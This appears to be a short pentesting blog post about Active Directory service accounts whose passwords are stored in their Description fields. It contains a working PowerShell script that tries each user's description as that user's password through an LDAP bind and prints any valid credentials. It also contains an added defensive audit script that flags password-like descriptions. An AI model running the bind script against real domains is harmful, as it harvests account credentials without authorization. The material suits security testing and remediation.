Dumbest pentesting script to ever succeed
July 09, 2019

Scanning for passwords in description fields in AD
In today’s episode of “I can’t believe this is real”, the PowerShell script below has a better than average likelihood of handing out service account credentials: it reads every user's Description attribute and tries it as that account's password.
```powershell
Import-Module ActiveDirectory

# Pull every user object together with its Description attribute
$users = Get-ADUser -Filter * -Properties Description
$currentDomain = "LDAP://" + ([ADSI]"").distinguishedName

foreach ($user in $users) {
    if ($null -ne $user.Description) {
        # Attempt an LDAP bind using the description text as this account's password
        $lookup = New-Object System.DirectoryServices.DirectoryEntry($currentDomain, $user.SamAccountName, $user.Description)
        try {
            # Touching a property forces the bind; it only succeeds if the description really is the password
            if ($null -ne $lookup.Name) {
                Write-Host "We have a valid credential with $($user.SamAccountName) $($user.Description)"
            }
        } catch {
            # Bind failed: the description is not this account's password, move on
        }
    }
}
```
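As an added defender-side example (not code from the original post), the audit below lists the accounts whose Description attribute looks like it holds a credential, flags whether the account carries an SPN (i.e. is likely a service account), and prints a report so the field can be cleared. It never attempts a logon. It assumes the RSAT ActiveDirectory module is available and the keyword list is a constructed starting point to extend for your own environment.

```powershell
# Added example, not from the original post: audit Description fields for
# likely secrets so they can be remediated, without attempting any bind.
Import-Module ActiveDirectory

function Find-SuspiciousDescriptions {
    param(
        # Constructed keyword list; extend it with terms used in your environment
        [string[]]$Keywords = @('password', 'passwd', 'pwd', 'pass:', 'pw:', 'cred')
    )

    # Only users that actually have a Description value
    Get-ADUser -Filter 'Description -like "*"' -Properties Description, Enabled, ServicePrincipalName |
        ForEach-Object {
            $desc = $_.Description
            $reasons = @()

            # -match is case-insensitive by default in PowerShell
            foreach ($k in $Keywords) {
                if ($desc -match [regex]::Escape($k)) { $reasons += "keyword '$k'" }
            }

            # A single token of 8+ non-space characters mixing letters, digits and symbols
            # looks more like a password than like a human-written sentence
            if ($desc -match '(?=\S*\d)(?=\S*[A-Za-z])(?=\S*[^\w\s])\S{8,}') {
                $reasons += 'password-like token'
            }

            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    SamAccountName = $_.SamAccountName
                    Enabled        = $_.Enabled
                    HasSPN         = ($_.ServicePrincipalName.Count -gt 0)
                    Description    = $desc
                    Reason         = ($reasons -join '; ')
                }
            }
        }
}

# Produce the report; review it, then clear the attribute on confirmed hits
$hits = Find-SuspiciousDescriptions
$hits | Format-Table -AutoSize

# After the account owner has rotated the exposed password, wipe the field:
# $hits | ForEach-Object { Set-ADUser -Identity $_.SamAccountName -Clear Description }
```

The keyword check catches the "password is ..." style of note, while the regex catches a bare secret pasted into the field with no surrounding words; the HasSPN column is there because the service accounts this post is about are the ones whose exposed password is also the one least likely to be rotated regularly.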